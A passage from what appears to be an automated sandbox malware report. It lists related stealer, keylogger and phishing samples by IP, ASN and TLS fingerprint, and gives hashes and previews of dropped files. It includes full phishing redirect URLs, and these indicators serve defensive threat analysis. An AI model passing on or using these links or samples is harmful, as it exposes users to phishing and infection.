                                                                                      Siparis po 1198624 _#U0130zmir #U0130stinyepark Projesi.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousDynamic StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      eInvoice.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      Po-5865A.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      https://u48346967.ct.sendgrid.net/ls/click?upn=u001.A0zc-2BEvyk1Wl-2FMpdhEZeKOri2-2FGgH2RTzsX65VEcnN5SaLyl0UT8OMFIJrPp3PpoUM6xY28FQ2N7ftppG5RudDteJXD3BQZCthiPi2c2ALFGlSPfhe-2FcxhcglgWUQb-2BQESuvSP1z-2Bm6yiScj3t94MRtf0LYKB9CrrSBugAIE2LYG8LmYpSkH60B-2FMZ3-2BrvjbSA4-2FMKq-2BcyWHr8EPqNcLYpXKIa0eXlisYAn-2BUQ7zduW7tl-2BbLdZxK7-2F64kDFJWjAhA5-2BQkfVJJJox5IXYuhbutR70TtJJBVXs1-2BGpCmHbl-2BDNTOjQhDGBdV0GcWgnTqzbjbnvsgf-2Be0TXvdX5Smk9Cf3e70Q9X7CCHEUK7n5Iz83JVMEOM-2Fand-2B23jD1RrWlwwdn356TAiWPO93YBbqf0SO77Y7wdjJ1b9FY9HkvpCMIajIk8oGDIkalcOsvDrkfpAsNhyAACh29yO16Fg-2FM5u3K-2FXbE9Ex7FVSxGjaaC9sm3ZFKCHARATSNuZ5Fje0JCvs-2FuHNf8MhNMkgfl0FBuxcFtouETvn8R0InFl5AtNwGS6Afu60jlKV5PLEF8GeumMl4Zuoh2K-2F2yPQclKc1crfKqXCOnUQUzOQ7UyIpV0r3b47s6ht1AVAEPjV3zoZw9RLpCyXdGkoI8n06eY007Qg9WwLvy7We-2BQcl-2FyYQ4K56RiNFy6ideRccN4rvz5rlbEO4SM2GPwiXl06aWh1Z8A-3D-3DayVm_7jfNTkQybv-2BVetjXJenftZxQwKjBczDJqHH7EaznqVv3v2Dkt-2FIgZwJNXIp-2FyMqSeIPtfO34Zh0BJrBXMe8iDwc4F5cynKVd9U-2BCWNvBhYWndn5YPpcrm9EU-2BINyUV9MYoGCAzxOgZamtaAmmSvzUZGau9tG0E7vfYFw2WK2ssr4DmY5GXF-2BgMFUeEjp9HrYndaGnf0PXO4kOxtTViX7PlJWm1KFcSCvZKxLAfO2BkacR3B5XEdLDYpCUp92-2FH-2FHkhtVIRx1yIxGh6p91O9ZVon-2F9iC9RT46lS0PoWolD8OcxI1a8fShT6Hp4QWQfdHwSEy80yGx3wt6ImkGF4v9TXkQs-2Fsq-2FVFPoSnqaJLrItk8v5xWRdhyDRHKG-2BDTjP6JA9QphZ2npWlpDplGG-2B7VPrWDZBnEu36loOA6wRajUleT-2BwoMeGN4STY52Ur27KRveKCJr82irXKChZwqe-2BaUbmDOUwyLdpuYgAFKsd-2BPzSGCG9KIfFEO3qjrRe-2Ft9WxzxVxFb7rM1MFj1q2QSoqqpSZyyIO6o9dQWLpdkFrZCNwiV9o0NuRkda7B0vqLodHzU4jQ4E2ZVSRC2Gc87k08fCi-2BBF7Dmw-2F3-2FQYcQ-2BUHjUCqjlkaHmxOAI7-2FhdUS1Wb7BgsTAm-2Ft-2BvXBxupXitGd4JcEDUe0WuuxdFLUCWiEzHEB6DI0pZnKp0MjuL6t-2FHdSSyJSuzZQLJWoI1iWOBow7nssQ-2FtT6mq0c4kg9bIepJUAi8J12B9eClWiTZDtbREopSTPA0TrHAq8mBDFqCQ0MfGj13zUsahv2EEEPM5XcF8DfOVu-2BwcjmThtw28U2MS5BiDqE1Pwg-2BCEH40qmpHlF5lcXadw9ehGsQbMKc0VYqPjH2-2BLldks6uo-2Fln-2BeeieWNP8wXJfHHwtYJznNHWBqLw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      z705688y7t7tgggju97867756576.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25SERIAL%2525wDnNeW8yycT&sa=t&esrc=nNeW8F%25SERIAL%2525A0xys8Em2FL&source=&cd=tS6T8%25SERIAL%2525Tiw9XH&cad=XpPkDfJX%25SERIAL%2525VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/www.monument-funerar.ro/admin/view/image/payment/#test@example.deGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      TELEGRAMRUhesaphareketi-01-27112024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Teklif_PDF.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Siparis po 1198624 _#U0130zmir #U0130stinyepark Projesi.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousDynamic StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      eInvoice.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      Po-5865A.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                      • 149.154.167.99
                                                                                      https://u48346967.ct.sendgrid.net/ls/click?upn=u001.A0zc-2BEvyk1Wl-2FMpdhEZeKOri2-2FGgH2RTzsX65VEcnN5SaLyl0UT8OMFIJrPp3PpoUM6xY28FQ2N7ftppG5RudDteJXD3BQZCthiPi2c2ALFGlSPfhe-2FcxhcglgWUQb-2BQESuvSP1z-2Bm6yiScj3t94MRtf0LYKB9CrrSBugAIE2LYG8LmYpSkH60B-2FMZ3-2BrvjbSA4-2FMKq-2BcyWHr8EPqNcLYpXKIa0eXlisYAn-2BUQ7zduW7tl-2BbLdZxK7-2F64kDFJWjAhA5-2BQkfVJJJox5IXYuhbutR70TtJJBVXs1-2BGpCmHbl-2BDNTOjQhDGBdV0GcWgnTqzbjbnvsgf-2Be0TXvdX5Smk9Cf3e70Q9X7CCHEUK7n5Iz83JVMEOM-2Fand-2B23jD1RrWlwwdn356TAiWPO93YBbqf0SO77Y7wdjJ1b9FY9HkvpCMIajIk8oGDIkalcOsvDrkfpAsNhyAACh29yO16Fg-2FM5u3K-2FXbE9Ex7FVSxGjaaC9sm3ZFKCHARATSNuZ5Fje0JCvs-2FuHNf8MhNMkgfl0FBuxcFtouETvn8R0InFl5AtNwGS6Afu60jlKV5PLEF8GeumMl4Zuoh2K-2F2yPQclKc1crfKqXCOnUQUzOQ7UyIpV0r3b47s6ht1AVAEPjV3zoZw9RLpCyXdGkoI8n06eY007Qg9WwLvy7We-2BQcl-2FyYQ4K56RiNFy6ideRccN4rvz5rlbEO4SM2GPwiXl06aWh1Z8A-3D-3DayVm_7jfNTkQybv-2BVetjXJenftZxQwKjBczDJqHH7EaznqVv3v2Dkt-2FIgZwJNXIp-2FyMqSeIPtfO34Zh0BJrBXMe8iDwc4F5cynKVd9U-2BCWNvBhYWndn5YPpcrm9EU-2BINyUV9MYoGCAzxOgZamtaAmmSvzUZGau9tG0E7vfYFw2WK2ssr4DmY5GXF-2BgMFUeEjp9HrYndaGnf0PXO4kOxtTViX7PlJWm1KFcSCvZKxLAfO2BkacR3B5XEdLDYpCUp92-2FH-2FHkhtVIRx1yIxGh6p91O9ZVon-2F9iC9RT46lS0PoWolD8OcxI1a8fShT6Hp4QWQfdHwSEy80yGx3wt6ImkGF4v9TXkQs-2Fsq-2FVFPoSnqaJLrItk8v5xWRdhyDRHKG-2BDTjP6JA9QphZ2npWlpDplGG-2B7VPrWDZBnEu36loOA6wRajUleT-2BwoMeGN4STY52Ur27KRveKCJr82irXKChZwqe-2BaUbmDOUwyLdpuYgAFKsd-2BPzSGCG9KIfFEO3qjrRe-2Ft9WxzxVxFb7rM1MFj1q2QSoqqpSZyyIO6o9dQWLpdkFrZCNwiV9o0NuRkda7B0vqLodHzU4jQ4E2ZVSRC2Gc87k08fCi-2BBF7Dmw-2F3-2FQYcQ-2BUHjUCqjlkaHmxOAI7-2FhdUS1Wb7BgsTAm-2Ft-2BvXBxupXitGd4JcEDUe0WuuxdFLUCWiEzHEB6DI0pZnKp0MjuL6t-2FHdSSyJSuzZQLJWoI1iWOBow7nssQ-2FtT6mq0c4kg9bIepJUAi8J12B9eClWiTZDtbREopSTPA0TrHAq8mBDFqCQ0MfGj13zUsahv2EEEPM5XcF8DfOVu-2BwcjmThtw28U2MS5BiDqE1Pwg-2BCEH40qmpHlF5lcXadw9ehGsQbMKc0VYqPjH2-2BLldks6uo-2Fln-2BeeieWNP8wXJfHHwtYJznNHWBqLw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      z705688y7t7tgggju97867756576.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      ACPCApbnpvwfhco.elfGet hashmaliciousUnknownBrowse
                                                                                      • 162.65.144.8
                                                                                      https://michiganchronicle.com/philanthropy-under-siege-how-the-fight-against-the-fearless-fund-threatens-black-womens-progress-in-detroit/Get hashmaliciousUnknownBrowse
                                                                                      • 162.55.246.61
                                                                                      mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 162.52.56.205
                                                                                      nabm68k.elfGet hashmaliciousUnknownBrowse
                                                                                      • 162.48.203.221
                                                                                      FATURA.exeGet hashmaliciousFormBookBrowse
                                                                                      • 162.0.209.213
                                                                                      loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                      • 162.10.7.182
                                                                                      Purchase Order AB013058.PDF.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                                                      • 162.55.60.2
                                                                                      MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                      • 162.0.209.213

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      37f463bf4616ecd445d4a1937da06e19faktura461250706050720242711#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 149.154.167.220
                                                                                      rXVQIR00071840-180218627117.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • 149.154.167.220
                                                                                      SOLICITUD DE PRESUPUESTO 27-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 149.154.167.220
                                                                                      factura_461250706050720242711#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 149.154.167.220
                                                                                      Purchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 149.154.167.220
                                                                                      Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                      • 149.154.167.220
                                                                                      z34SOLICITUDDEP.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 149.154.167.220
                                                                                      SERV27THNOVSCANNEDcopiesACCOUNT-SUMMARYcon3-2.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                      • 149.154.167.220
                                                                                      awb_shipping_post_27112024224782020031808174CN27112024000001124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                      • 149.154.167.220

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XgbXowhljC.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1216
                                                                                      Entropy (8bit):5.34331486778365
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                                      MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                                      SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                                      SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                                      SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oS6KsQIqJxe038Y.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1216
                                                                                      Entropy (8bit):5.34331486778365
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                                      MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                                      SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                                      SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                                      SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                                      Malicious:true
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2232
                                                                                      Entropy (8bit):5.380503343696294
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:SWSU4xympx4RfoUP7gZ9tK8NPZHUx7u1iMuge//ZSUyus:SLHxv/IwLZ2KRH6OugEs
                                                                                      MD5:0E8146C45B3D8B88FC48CEFF78B7CEB9
                                                                                      SHA1:DBF2CE66F704F075D22B41831CB822AA84B418EC
                                                                                      SHA-256:B5AF8478C918C666AD85FE02EBBD7682947E29DAAD9EFFE371A2AD99EA89DD38
                                                                                      SHA-512:3655F497858B4B29494D4C79599ECE11066CA27C13D7528CFD7EB2D5571A7050F61D282DCCDE2E04631003CCEA19A32339B8F6E236B8E174B5162C40EE896DC5
                                                                                      Malicious:false
                                                                                      Preview:@...e.................................K..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                      C:\Users\user\AppData\Local\Temp\TJa06208

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):18274
                                                                                      Entropy (8bit):7.836906789761796
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:eoytdoytxDnoLUkMpuzx9GtkGtMtNts7NoNBTr:FyQyDnow3puzit/tMntso
                                                                                      MD5:9E8B01E30341F8304B95AD58053E3554
                                                                                      SHA1:F24F7636E72FA9F8219480B0EFAA0BDCE1B4218F
                                                                                      SHA-256:6A575630266F47B4CE3E673C5A3F1B9944016E8C9B5D8718C65B73394919AA0E
                                                                                      SHA-512:0DC8F41D969EA28A811F01B53D5EE5B3D1EBF4189D57C37D5BFA353C84160103F799F8B9B8C000E9E260A09B1FD7A6F53023589BE0B8A3B2F82F1B0D02696B2C
                                                                                      Malicious:false
                                                                                      Preview:PK........%JDW...............Files/AFWAAFRXKO.docx..Ir@!.D.......... 1[.Tw...V..I5....D....&.....t5....C.P.xt.;...9.u..)nh..p.I.....)*.}.... ...dBp...:.t%..'..l..P..KN9Q.a..BX.r+B[7..v.?.|......]0B.:.vB=....5. ....f.\....".....".Tm./.$...g.C....m..GLS5...I.6.u/MU.5.^.w......-.H=.v..... ..o#.....LJu..g.M..r.9..s.....jq..r{....0.......Vk2.... ..../...GS.......X*n.j.$hA...$.....w..Ji.......e..b.~e...t....AW.Kd.R..........Z.m.p..n<...6.....9.]n.|;t..2.}..=:~...s_dS..K...<...N...Q..%.Lz.E/..{..".F..s............-.{.v.lp.3,{..Tf...>.{..[......fz.............{k.O.V..l......<... ...u..O-.tV'.t.Y..UsmX.[....<.!..`}.v....)...H.U.s....n.......=.J .......PK........%JDW...............Files/AFWAAFRXKO.pdf..Ir@!.D.......... 1[.Tw...V..I5....D....&.....t5....C.P.xt.;...9.u..)nh..p.I.....)*.}.... ...dBp...:.t%..'..l..P..KN9Q.a..BX.r+B[7..v.?.|......]0B.:.vB=....5. ....f.\....".....".Tm./.$...g.C....m..GLS5...I.6.u/MU.5.^.w......-.H=.v..... .

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2t00aum.x1z.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_auxere2z.12l.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0wgw5qu.fm5.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_br4g011v.pxw.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cg01i0u4.mps.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cizcb4vn.bxr.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckh5sx3u.v05.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uyt00vdd.aqz.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\tmpF214.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):1583
                                                                                      Entropy (8bit):5.109374393038211
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt5Kxvn:cgergYrFdOFzOzN33ODOiDdKrsuTgv
